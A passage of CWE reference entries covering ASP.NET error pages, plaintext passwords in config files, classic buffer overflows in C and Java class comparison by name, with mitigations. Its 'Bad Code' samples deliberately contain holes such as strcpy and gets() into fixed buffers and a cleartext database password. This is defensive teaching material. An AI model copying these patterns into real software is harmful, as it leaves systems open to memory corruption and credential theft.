Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application.

+ Demonstrative Examples

Example 1

An insecure ASP.NET application setting:

(Bad Code)
Example Language: ASP.NET 
<customErrors mode="Off" />

Custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned.

Here is a more secure setting:

(Good Code)
Example Language: ASP.NET 
<customErrors mode="RemoteOnly" />

Custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned.

+ Potential Mitigations

Phases: System Configuration; Implementation

Handle exceptions appropriately in source code. The best practice is to use a custom error message. Make sure that the mode attribute is set to "RemoteOnly" in the web.config file as shown in the following example.

(Good Code)
 
<customErrors mode="RemoteOnly" />

The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used. It should be configured to use a custom page as follows:

(Good Code)
 
<customErrors mode="On" defaultRedirect="YourErrorPage.htm" />

Phase: Architecture and Design

Do not attempt to process an error or attempt to mask it.

Phase: Implementation

Verify return values are correct and do not supply sensitive information about the system.

Phase: System Configuration

ASP .NET applications should be configured to use custom error pages instead of the framework default page.

+ Background Details

The mode attribute of the <customErrors> tag defines whether custom or default error pages are used.

+ Relationships
ChildOf Category 2: Environment (view 700, Seven Pernicious Kingdoms, primary)
ChildOf Category 10: ASP.NET Environment Issues (view 699, Development Concepts, primary)
ChildOf Weakness Class 756: Missing Custom Error Page (view 1000, Research Concepts, primary)
ChildOf Category 963: SFP Secondary Cluster: Exposed Data (view 888, Software Fault Pattern (SFP) Clusters, primary)
+ Taxonomy Mappings
Mapped Taxonomy Name: 7 Pernicious Kingdoms; Mapped Node Name: ASP.NET Misconfiguration: Missing Custom Error Handling
+ References
M. Howard, D. LeBlanc and J. Viega. "19 Deadly Sins of Software Security". McGraw-Hill/Osborne. 2005.
OWASP, Fortify Software. "ASP.NET Misconfiguration: Missing Custom Error Handling". <http://www.owasp.org/index.php/ASP.NET_Misconfiguration:_Missing_Custom_Error_Handling>.
+ Content History
Submissions
7 Pernicious Kingdoms (Externally Mined)
Modifications
2008-07-01: Eric Dalci, Cigital (External); updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction
2008-09-08: CWE Content Team, MITRE (Internal); updated Relationships, Other_Notes, References, Taxonomy_Mappings
2008-10-14: CWE Content Team, MITRE (Internal); updated Relationships
2008-11-24: CWE Content Team, MITRE (Internal); updated Common_Consequences, Other_Notes, Potential_Mitigations
2009-03-10: CWE Content Team, MITRE (Internal); updated Name, Relationships
2009-07-27: CWE Content Team, MITRE (Internal); updated Background_Details, Common_Consequences, Other_Notes
2011-06-01: CWE Content Team, MITRE (Internal); updated Common_Consequences
2011-06-27: CWE Content Team, MITRE (Internal); updated Common_Consequences
2012-05-11: CWE Content Team, MITRE (Internal); updated Demonstrative_Examples, Relationships
2012-10-30: CWE Content Team, MITRE (Internal); updated Potential_Mitigations
2013-02-21: CWE Content Team, MITRE (Internal); updated Potential_Mitigations
2014-07-30: CWE Content Team, MITRE (Internal); updated Relationships
Previous Entry Names
2009-03-10: ASP.NET Misconfiguration: Missing Custom Error Handling

CWE-13: ASP.NET Misconfiguration: Password in Configuration File

Weakness ID: 13
Abstraction: Variant
Status: Draft
+ Description

Description Summary

Storing a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resource, making it an easy target for attackers.
+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Common Consequences
Scope: Access Control

Technical Impact: Gain privileges / assume identity

+ Demonstrative Examples

Example 1

The following excerpt from an XML configuration file defines a connectionString for connecting to a database.

(Bad Code)
Example Language: XML 
<connectionStrings>
<add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;"
providerName="System.Data.Odbc" />
</connectionStrings>

The connectionString is in cleartext, allowing anyone who can read the file access to the database.

Example 2

The following example shows a portion of a configuration file for an ASP.NET application. This configuration file includes username and password information for a connection to a database, but the pair is stored in plaintext.

(Bad Code)
Example Language: ASP.NET 
...
<connectionStrings>
<add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" />
</connectionStrings>
...

Username and password information should not be included in a configuration file or a properties file in plaintext, as this allows anyone who can read the file to access the resource. If possible, encrypt this information.

+ Potential Mitigations

Phase: Implementation

Credentials stored in configuration files should be encrypted. Use standard APIs and industry-accepted algorithms to encrypt the credentials stored in configuration files.

+ Relationships
ChildOf Category 2: Environment (view 700, Seven Pernicious Kingdoms, primary)
ChildOf Category 10: ASP.NET Environment Issues (view 699, Development Concepts, primary)
ChildOf Weakness Variant 260: Password in Configuration File (view 1000, Research Concepts, primary)
ChildOf Category 963: SFP Secondary Cluster: Exposed Data (view 888, Software Fault Pattern (SFP) Clusters, primary)
+ Taxonomy Mappings
Mapped Taxonomy Name: 7 Pernicious Kingdoms; Mapped Node Name: ASP.NET Misconfiguration: Password in Configuration File
+ References
Microsoft Corporation. "How To: Encrypt Configuration Sections in ASP.NET 2.0 Using DPAPI". <http://msdn.microsoft.com/en-us/library/ms998280.aspx>.
Microsoft Corporation. "How To: Encrypt Configuration Sections in ASP.NET 2.0 Using RSA". <http://msdn.microsoft.com/en-us/library/ms998283.aspx>.
Microsoft Corporation. ".NET Framework Developer's Guide - Securing Connection Strings". <http://msdn.microsoft.com/en-us/library/89211k9b(VS.80).aspx>.
+ Content History
Submissions
7 Pernicious Kingdoms (Externally Mined)
Modifications
2008-07-01: Eric Dalci, Cigital (External); updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction
2008-09-08: CWE Content Team, MITRE (Internal); updated Relationships, References, Taxonomy_Mappings
2009-07-27: CWE Content Team, MITRE (Internal); updated Demonstrative_Examples
2011-06-01: CWE Content Team, MITRE (Internal); updated Common_Consequences
2012-05-11: CWE Content Team, MITRE (Internal); updated Relationships
2012-10-30: CWE Content Team, MITRE (Internal); updated Demonstrative_Examples
2013-02-21: CWE Content Team, MITRE (Internal); updated Potential_Mitigations
2014-07-30: CWE Content Team, MITRE (Internal); updated Demonstrative_Examples, Relationships

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Weakness ID: 120
Abstraction: Base
Status: Incomplete
+ Description

Description Summary

The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

Extended Description

A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the "classic" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.

+ Alternate Terms
buffer overrun:

Some prominent vendors and researchers use the term "buffer overrun," but most people use "buffer overflow."

Unbounded Transfer
+ Terminology Notes

Many issues that are now called "buffer overflows" are substantively different than the "classic" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C

C++

Assembly

+ Common Consequences
Scope: Integrity / Confidentiality / Availability

Technical Impact: Execute unauthorized code or commands

Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service.

Scope: Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (CPU)

Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges.

Effectiveness: High

Detection techniques for buffer-related errors are more mature than for most other weakness types.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Manual Analysis

Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array.

(Bad Code)
Example Language: C
char last_name[20];
printf ("Enter your last name: ");
scanf ("%s", last_name);

The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters "Very_very_long_last_name", which is 24 characters long, a buffer overflow will occur, since the array can hold only 19 characters plus the terminating null byte.
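
As an editorial sketch (not part of the original CWE example), one common fix is to bound the conversion with a field width one smaller than the buffer; the code below reuses the same last_name buffer under that assumption.

(Good Code)
Example Language: C
#include <stdio.h>

int main(void) {
    char last_name[20];
    printf("Enter your last name: ");
    /* The field width 19 leaves room for the terminating null byte,
       so scanf() cannot write past the end of last_name. */
    if (scanf("%19s", last_name) == 1) {
        printf("Hello, %s\n", last_name);
    }
    return 0;
}

Oversized input is silently truncated here; a real program would also decide how to report or reject truncated names.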

Example 2

The following code attempts to create a local copy of a buffer to perform some manipulations to the data.

(Bad Code)
Example Language: C
void manipulate_string(char* string){
char buf[24];
strcpy(buf, string);
...
}

However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and blindly copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter.

Example 3

The excerpt below calls the gets() function in C, which is inherently unsafe.

(Bad Code)
Example Language: C
char buf[24];
printf("Please enter your name and press <Enter>\n");
gets(buf);
...

The gets() function blindly copies all input from STDIN to the buffer without restricting how much is copied. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition.
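
A minimal, editorial sketch of a bounded alternative (not taken from the CWE entry): fgets() reads at most one byte less than the buffer size and always null-terminates, so the overflow cannot occur.

(Good Code)
Example Language: C
#include <stdio.h>
#include <string.h>

int main(void) {
    char buf[24];
    printf("Please enter your name and press <Enter>\n");
    /* fgets() copies at most sizeof(buf) - 1 bytes and null-terminates,
       so oversized input is truncated instead of overflowing buf. */
    if (fgets(buf, sizeof(buf), stdin) != NULL) {
        buf[strcspn(buf, "\n")] = '\0'; /* strip the trailing newline, if present */
        printf("Hello, %s\n", buf);
    }
    return 0;
}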

Example 4

In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file.

(Bad Code)
Example Languages: C and C++ 
...
struct hostent *clienthp;
char hostname[MAX_LEN];

// create server socket, bind to server address and listen on socket
...

// accept client connections and process requests
int count = 0;
for (count = 0; count < MAX_CONNECTIONS; count++) {

int clientlen = sizeof(struct sockaddr_in);
int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen);

if (clientsocket >= 0) {
clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);
strcpy(hostname, clienthp->h_name);
logOutput("Accepted client connection from host ", hostname);

// process client request
...
close(clientsocket);
}
}
close(serversocket);
...

However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method.

+ Observed Examples
ReferenceDescription
buffer overflow using command with long argument
buffer overflow in local program using long environment variable
buffer overflow in comment characters, when product increments a counter for a ">" but does not decrement for "<"
By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.
+ Potential Mitigations

Phase: Requirements

Strategy: Language Selection

Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.

Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples include the Safe C String Library (SafeStr) by Messier and Viega [R.120.4], and the Strsafe.h library from Microsoft [R.120.3]. These libraries provide safer versions of overflow-prone string-handling functions.

This is not a complete solution, since many buffer overflows are not related to strings.

Phase: Build and Compilation

Strategy: Compilation or Build Hardening

Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.

For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice.

Effectiveness: Defense in Depth

This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Implementation

Consider adhering to the following rules when allocating and managing an application's memory:

  • Double check that your buffer is as large as you specify.

  • When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.

  • Check buffer boundaries if accessing the buffer in a loop and make sure you are not in danger of writing past the allocated space.

  • If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
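
As a sketch of the "accept known good" approach for the name-reading examples above, the hypothetical helper below accepts only alphabetic input of a bounded length and rejects everything else; the exact character set and length limit are assumptions for illustration.

(Good Code)
Example Language: C 
#include <ctype.h>
#include <string.h>

/* illustrative whitelist check: accept only alphabetic names of 1 to 19 characters */
int is_valid_name(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 19) {
        return 0;
    }
    for (size_t i = 0; i < len; i++) {
        if (!isalpha((unsigned char)s[i])) {
            return 0;
        }
    }
    return 1;
}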

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Operation

Strategy: Environment Hardening

Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.

Examples include Address Space Layout Randomization (ASLR) [R.120.5] [R.120.7] and Position-Independent Executables (PIE) [R.120.14].

Effectiveness: Defense in Depth

This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Operation

Strategy: Environment Hardening

Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [R.120.7] [R.120.9].

Effectiveness: Defense in Depth

This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application.

Phases: Build and Compilation; Operation

Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution.

Phase: Implementation

Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.

Effectiveness: Moderate

This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131).
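
Where such length-aware functions are not available, a small wrapper can be created, as the mitigation suggests. The hypothetical copy_bounded() below is one sketch: it refuses input that does not fit and always null-terminates; the name and return convention are assumptions for illustration.

(Good Code)
Example Language: C 
#include <stddef.h>
#include <string.h>

/* copy src into dst (of size dst_size), always null-terminating;
   returns 0 on success, -1 if src would not fit */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size) {
        return -1;
    }
    memcpy(dst, src, len + 1); /* +1 copies the null terminator */
    return 0;
}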

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
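
A minimal sketch of this strategy in C is shown below: a small numeric ID indexes a fixed table of filenames, and any ID outside the table is rejected. The table contents are hypothetical.

(Good Code)
Example Language: C 
#include <stddef.h>

/* fixed mapping from numeric IDs to filenames; nothing else is ever opened */
static const char *file_table[] = {
    "/data/reports/summary.txt",
    "/data/reports/detail.txt"
};

const char *lookup_file(int id) {
    if (id < 0 || (size_t)id >= sizeof(file_table) / sizeof(file_table[0])) {
        return NULL; /* unknown ID: reject */
    }
    return file_table[id];
}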

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.120.10]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class119Improper Restriction of Operations within the Bounds of a Memory Buffer
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory722OWASP Top Ten 2004 Category A1 - Unvalidated Input
Weaknesses in OWASP Top Ten (2004)711
ChildOfCategoryCategory726OWASP Top Ten 2004 Category A5 - Buffer Overflows
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory741CERT C Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory8652011 Top 25 - Risky Resource Management
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory875CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory970SFP Secondary Cluster: Faulty Buffer Access
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness BaseWeakness Base123Write-what-where Condition
Research Concepts1000
ParentOfWeakness VariantWeakness Variant785Use of Path Manipulation Function without Maximum-sized Buffer
Development Concepts (primary)699
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base170Improper Null Termination
Research Concepts1000
CanFollowWeakness VariantWeakness Variant231Improper Handling of Extra Values
Research Concepts1000
CanFollowWeakness BaseWeakness Base242Use of Inherently Dangerous Function
Research Concepts1000
CanFollowWeakness BaseWeakness Base416Use After Free
Research Concepts1000
CanFollowWeakness BaseWeakness Base456Missing Initialization of a Variable
Research Concepts1000
CanAlsoBeWeakness VariantWeakness Variant196Unsigned to Signed Conversion Error
Research Concepts1000
+ Relationship Notes

At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them.

+ Affected Resources
  • Memory
+ Functional Areas
  • Memory Management
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERUnbounded Transfer ('classic overflow')
7 Pernicious KingdomsBuffer Overflow
CLASPBuffer overflow
OWASP Top Ten 2004A1CWE More SpecificUnvalidated Input
OWASP Top Ten 2004A5CWE More SpecificBuffer Overflows
CERT C Secure CodingSTR35-CDo not copy data from an unbounded source to a fixed-length array
WASC7Buffer Overflow
CERT C++ Secure CodingSTR35-CPPDo not copy data from an unbounded source to a fixed-length array
Software Fault PatternsSFP8Faulty Buffer Access
+ White Box Definitions

A weakness where the code path includes a Buffer Write Operation such that:

1. the expected size of the buffer is greater than the actual size of the buffer where expected size is equal to the sum of the size of the data item and the position in the buffer

Where Buffer Write Operation is a statement that writes a data item of a certain size into a buffer at a certain position and at a certain index

+ References
[R.120.1] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 5, "Public Enemy #1: The Buffer Overrun" Page 127. 2nd Edition. Microsoft. 2002.
[R.120.2] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 5: Buffer Overruns." Page 89. McGraw-Hill. 2010.
[R.120.3] [REF-27] Microsoft. "Using the Strsafe.h Functions". <http://msdn.microsoft.com/en-us/library/ms647466.aspx>.
[R.120.4] [REF-26] Matt Messier and John Viega. "Safe C String Library v1.0.3". <http://www.zork.org/safestr/>.
[R.120.5] [REF-22] Michael Howard. "Address Space Layout Randomization in Windows Vista". <http://blogs.msdn.com/michael_howard/archive/2006/05/26/address-space-layout-randomization-in-windows-vista.aspx>.
[R.120.6] Arjan van de Ven. "Limiting buffer overflows with ExecShield". <http://www.redhat.com/magazine/009jul05/features/execshield/>.
[R.120.7] [REF-29] "PaX". <http://en.wikipedia.org/wiki/PaX>.
[R.120.8] Jason Lam. "Top 25 Series - Rank 3 - Classic Buffer Overflow". SANS Software Security Institute. 2010-03-02. <http://software-security.sans.org/blog/2010/03/02/top-25-series-rank-3-classic-buffer-overflow/>.
[R.120.9] [REF-25] Microsoft. "Understanding DEP as a mitigation technology part 1". <http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-1.aspx>.
[R.120.10] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.120.11] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 3, "Nonexecutable Stack", Page 76.. 1st Edition. Addison Wesley. 2006.
[R.120.12] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 5, "Protection Mechanisms", Page 189.. 1st Edition. Addison Wesley. 2006.
[R.120.13] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "C String Handling", Page 388.. 1st Edition. Addison Wesley. 2006.
[R.120.14] [REF-37] Grant Murphy. "Position Independent Executables (PIE)". Red Hat. 2012-11-28. <https://securityblog.redhat.com/2012/11/28/position-independent-executables-pie/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-10-10CWE Content TeamMITREInternal
Changed name and description to more clearly emphasize the "classic" nature of the overflow.
2008-10-14CWE Content TeamMITREInternal
updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes
2008-11-24CWE Content TeamMITREInternal
updated Other_Notes, Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships
2009-07-27CWE Content TeamMITREInternal
updated Other_Notes, Potential_Mitigations, Relationships
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples, Description
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-02-18CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-10-14Unbounded Transfer ('Classic Buffer Overflow')

CWE-486: Comparison of Classes by Name

Weakness ID: 486
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The program compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.

Extended Description

If the decision to trust the methods and data of an object is based on the name of a class, it is possible for malicious users to send objects of the same name as trusted classes and thereby gain the trust afforded to known classes and types.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

Java

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

If a program relies solely on the name of an object to determine identity, it may execute the incorrect or unintended code.

+ Likelihood of Exploit

High

+ Demonstrative Examples

Example 1

In this example, the expression in the if statement compares the class of the inputClass object to a trusted class by comparing the class names.

(Bad Code)
Example Language: Java 
if (inputClass.getClass().getName().equals("TrustedClassName")) {
// Do something assuming you trust inputClass
// ...
}

However, multiple classes can have the same name, so comparing an object's class by name can allow an untrusted class with the same name as the trusted class to be used to execute unintended or incorrect code. To compare the class of an object to the intended class, the getClass() method and the comparison operator "==" should be used to ensure the correct trusted class is used, as shown in the following example.

(Good Code)
Example Language: Java 
if (inputClass.getClass() == TrustedClass.class) {
// Do something assuming you trust inputClass
// ...
}

Example 2

In this example, the Java class, TrustedClass, overrides the equals method of the parent class Object to determine equivalence of objects of the class. The overridden equals method first determines if the object, obj, is the same class as the TrustedClass object and then compares the object's fields to determine if the objects are equivalent.

(Bad Code)
Example Language: Java 
public class TrustedClass {
...

@Override
public boolean equals(Object obj) {
boolean isEquals = false;

// first check to see if the object is of the same class
if (obj.getClass().getName().equals(this.getClass().getName())) {

// then compare object fields
...
if (...) {
isEquals = true;
}
}

return isEquals;
}

...
}

However, the equals method compares the class names of the object, obj, and the TrustedClass object to determine if they are the same class. As with the previous example, using the name of the class to compare classes can lead to the execution of unintended or incorrect code if the object passed to the equals method is of another class with the same name. To compare the class of an object to the intended class, the getClass() method and the comparison operator "==" should be used to ensure the correct trusted class is used, as shown in the following example.

(Good Code)
Example Language: Java 
public boolean equals(Object obj) {
...

// first check to see if the object is of the same class
if (obj.getClass() == this.getClass()) {
...
}

...
}
+ Potential Mitigations

Phase: Implementation

